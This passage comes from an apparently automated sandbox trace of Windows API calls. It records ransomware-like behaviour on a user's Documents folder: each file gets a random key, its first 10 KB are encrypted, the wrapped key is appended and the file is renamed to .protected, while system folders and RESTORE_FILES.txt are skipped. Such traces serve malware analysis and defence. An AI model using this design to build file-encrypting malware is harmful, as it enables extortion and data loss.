lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.309] CloseHandle (hObject=0xa4) returned 1 [0091.309] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0091.309] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 43 [0091.309] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0091.309] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0091.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 45 [0091.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.309] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.309] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.") returned 45 [0091.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.309] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.309] lstrcmpW (lpString1=".", 
lpString2="RESTORE_FILES.txt") returned -1 [0091.309] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.309] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\..") returned 46 [0091.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.310] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.310] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.310] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.310] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.310] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="Windows") returned -1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="Program Files") returned -1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="Program Files (x86)") returned -1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="$Recycle.bin") returned 1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="System Volume Information") returned -1 [0091.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.310] StrStrIW (lpFirst="3cCl4.xlsx", lpSrch=".protected") returned 0x0 [0091.310] lstrcmpW (lpString1="3cCl4.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.310] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.310] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ccl4.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.311] StrStrW (lpFirst="3cCl4.xlsx", lpSrch=".txt") returned 0x0 
[0091.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.311] StrStrW (lpFirst="3cCl4.xlsx", lpSrch=".rar") returned 0x0 [0091.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.311] StrStrW (lpFirst="3cCl4.xlsx", lpSrch=".zip") returned 0x0 [0091.311] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.311] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.311] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.311] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.311] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.312] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.312] CloseHandle (hObject=0xb4) returned 1 [0091.312] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx.protected") returned 64 [0091.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ccl4.xlsx"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ccl4.xlsx.protected")) returned 1 [0091.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="Windows") returned -1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="Program Files") returned -1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="Program Files (x86)") returned -1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="$Recycle.bin") returned 1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="System Volume Information") returned -1 [0091.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrIW (lpFirst="5LG8RS49-6.docx", lpSrch=".protected") returned 0x0 [0091.313] lstrcmpW (lpString1="5LG8RS49-6.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.313] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.313] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5lg8rs49-6.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrW (lpFirst="5LG8RS49-6.docx", lpSrch=".txt") returned 0x0 [0091.313] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrW (lpFirst="5LG8RS49-6.docx", lpSrch=".rar") returned 0x0 [0091.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrW (lpFirst="5LG8RS49-6.docx", lpSrch=".zip") returned 0x0 [0091.313] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.314] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.314] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.314] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.314] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.314] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.314] CloseHandle (hObject=0xb4) returned 1 [0091.314] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx.protected") returned 69 [0091.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\5lg8rs49-6.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5lg8rs49-6.docx.protected")) returned 1 [0091.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="Windows") returned -1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="Program Files") returned -1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="Program Files (x86)") returned -1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="$Recycle.bin") returned 1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="System Volume Information") returned -1 [0091.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.315] StrStrIW (lpFirst="69DV0.odp", lpSrch=".protected") returned 0x0 [0091.315] lstrcmpW (lpString1="69DV0.odp", lpString2="RESTORE_FILES.txt") returned -1 [0091.315] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.315] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\69dv0.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.316] StrStrW (lpFirst="69DV0.odp", lpSrch=".txt") returned 0x0 [0091.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.316] StrStrW (lpFirst="69DV0.odp", lpSrch=".rar") returned 0x0 [0091.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.316] StrStrW (lpFirst="69DV0.odp", lpSrch=".zip") returned 0x0 [0091.316] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.316] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.316] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.317] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.317] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.317] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.317] CloseHandle (hObject=0xb4) returned 1 [0091.317] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp.protected") returned 63 [0091.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\69dv0.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\69DV0.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\69dv0.odp.protected")) returned 1 [0091.319] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="Windows") returned -1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="Program Files") returned -1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="Program Files (x86)") returned -1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="$Recycle.bin") returned 1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="System Volume Information") returned -1 [0091.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrIW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".protected") returned 0x0 [0091.319] lstrcmpW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.319] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.319] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6lautce5icktdbzka cw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", 
lpSrch=".txt") returned 0x0 [0091.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".rar") returned 0x0 [0091.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".zip") returned 0x0 [0091.319] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.320] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.320] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.320] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.320] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.320] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.320] CloseHandle (hObject=0xb4) returned 1 [0091.320] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx.protected") returned 79 [0091.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6lautce5icktdbzka cw.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6lautce5icktdbzka cw.xlsx.protected")) returned 1 [0091.321] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="Windows") returned -1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="Program Files") returned -1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="Program Files (x86)") returned -1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="$Recycle.bin") returned 1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="System Volume Information") returned -1 [0091.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.321] StrStrIW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".protected") returned 0x0 [0091.321] lstrcmpW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.321] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.321] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7sc7dpjcftod6uzuvwut.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xb4 [0091.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.322] StrStrW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".txt") returned 0x0 [0091.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.322] StrStrW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".rar") returned 0x0 [0091.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.322] StrStrW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".zip") returned 0x0 [0091.322] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.322] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.323] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.323] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.323] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.323] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.323] CloseHandle (hObject=0xb4) returned 1 [0091.323] wnsprintfW (in: pszDest=0x4695e0, 
